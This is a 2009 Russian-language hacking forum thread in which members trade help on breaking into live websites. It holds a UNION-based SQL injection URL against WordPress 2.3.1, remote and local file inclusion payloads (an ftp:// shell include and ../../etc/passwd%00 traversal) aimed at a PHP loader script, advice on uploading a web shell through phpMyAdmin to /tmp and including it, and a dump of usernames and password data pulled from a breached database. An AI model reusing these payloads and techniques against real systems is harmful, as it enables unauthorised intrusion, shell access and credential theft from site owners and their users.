Ваши вопросы по уязвимостям.

26.05.2009, 16:09

mak-shapova

Новичок

Регистрация: 11.01.2009

Сообщений: 15

С нами: 9121266

Репутация: 13

пытаюсь заюзать багу в wordpress 2.3.1
http://site.com/bloggi/?feed=rss2&p=11/**/union/**/select/**/1,2/**/+--+
в ответ ошибка

Цитата:

WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND comment_approved = '1' ORDER BY comment_date_gmt DESC LIMIT 10' at line 1]
SELECT wp_comments.* FROM wp_comments WHERE comment_post_ID = AND comment_approved = '1' ORDER BY comment_date_gmt DESC LIMIT 10

че делать?

𝕏 Twitter Reddit Telegram Копировать ссылку

26.05.2009, 22:11

PaCo

Постоянный

Регистрация: 06.02.2008

Сообщений: 494

С нами: 9610769

Репутация: 380

смотри на запрос:
SELECT wp_comments.* FROM wp_comments WHERE comment_post_ID = AND comment_approved = '1' ORDER BY comment_date_gmt DESC LIMIT 10

из него же видно что comment_post_ID = идет сравнения но ничего не вставляеться в запрос т.к. твой данные не прошли фильтр.

27.05.2009, 09:46

Byrger

Постоянный

Регистрация: 07.03.2008

Сообщений: 479

С нами: 9567480

Репутация: 61

Подскажите есть ли уязвимость в этом скрипте подгрузки?
Если да, то как можно использовать для PHP-inj

PHP код:


		
			
if (!IsSet($t)&!IsSet($f))

    {

    $f="main";

    $filename=$f . ".php";

    }

    else

        {

        if (IsSet($t)&!IsSet($f))

            {

            $filename=$t . "/index.php";

            }

        if (IsSet($t)&IsSet($f))

            {

            $filename= $t . "/" . $f . ".php";

            }

        if (!IsSet($t)&IsSet($f))

            {

            $filename=$f . ".php";

            }

        }





if (file_exists("$filename"))

{ include("$filename"); }

else

{ echo " <div class=\"alert\"> Ошибка 404, Страница не найдена. </div>"; }

27.05.2009, 09:53

Shaitan-Devil

Участник форума

Регистрация: 15.08.2008

Сообщений: 167

С нами: 9336002

Репутация: 204

Есть phpmyadmin и юзер с полными правами. Пытаюсь залить шелл в разные директории пишет:"Can't create a file...", но успешно создает при попытке залить в /tmp/. Что можно сделать в этой ситуации?

27.05.2009, 10:01

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

С нами: 9649706

Репутация: 3338

2 Shaitan-Devil:

искать директорию на запись, например сканером сайта на папки

27.05.2009, 10:07

Iceangel_

Постоянный

Регистрация: 09.07.2006

Сообщений: 553

С нами: 10441826

Репутация: 1861

2 Byrger
[RFI]
заливаешь на фтп шел с именем index.php

Цитата:

?t=ftp://login: password@site.com

или шелл с любым именем, но без расширения

Цитата:

?f=ftp://login: password@site.com/shell

[LFI]

Цитата:

?t=../../../../../../../../etc/passwd%00

Цитата:

?f=../../../../../../../../etc/passwd%00

2 Shaitan-Devil
можешь посмотреть сайты по реверс айпи на присутствие локального инклуда, и потом инклуднуть записанный в /tmp шелл

Последний раз редактировалось Iceangel_; 27.05.2009 в 10:09..

27.05.2009, 11:05

Byrger

Постоянный

Регистрация: 07.03.2008

Сообщений: 479

С нами: 9567480

Репутация: 61

Цитата:

Сообщение от Iceangel_

2 Byrger
[RFI]
заливаешь на фтп шел с именем index.php

или шелл с любым именем, но без расширения

[LFI]

2 Shaitan-Devil
можешь посмотреть сайты по реверс айпи на присутствие локального инклуда, и потом инклуднуть записанный в /tmp шелл

Ошибку 404 типо выводит. Проверка существования файла срабатывает.
Оба способа пробовал

27.05.2009, 10:09

Rubaka

Участник форума

Регистрация: 02.09.2007

Сообщений: 292

С нами: 9837719

Репутация: 466

2 Byrger

если в $t диру а в $f имя файла то можно будет проинклюдить существующий файл.

27.05.2009, 11:28

satana8920

Постоянный

Регистрация: 22.09.2006

Сообщений: 531

С нами: 10333826

Репутация: 369

[0]:webmaster:њyЯu›И§
[1]:administrator:џЊ6г–А¶Ґ2И
[2]:morogoy:¶pР
[3]:dorogoynn:Эxi›лPcх
[4]:anna:NЂ—оB7е
[5]:dorogoy:Уќ=цКі¶э ѓ
вывожу из 5й ветки базы он мне вот такое дело выдает в чем беда? как исправить?

Последний раз редактировалось satana8920; 27.05.2009 в 11:31..

#10

27.05.2009, 11:38

$n@ke

Постоянный

Регистрация: 18.09.2006

Сообщений: 867

С нами: 10339586

Репутация: 1396

Цитата:

Сообщение от satana8920

вывожу из 5й ветки базы он мне вот такое дело выдает в чем беда? как исправить?

попробуй
AES_DECRYPT(AES_ENCRYPT(
хотя, судя по всему ты юзал СИПТ, и там по умолчанию крипт.

еще варианты:

PHP код:


		
			
cast(Version()+as+binary)

CONVERT(Version(),binary)

convert(version()+using+latin1)  

convert(version()+using+binary)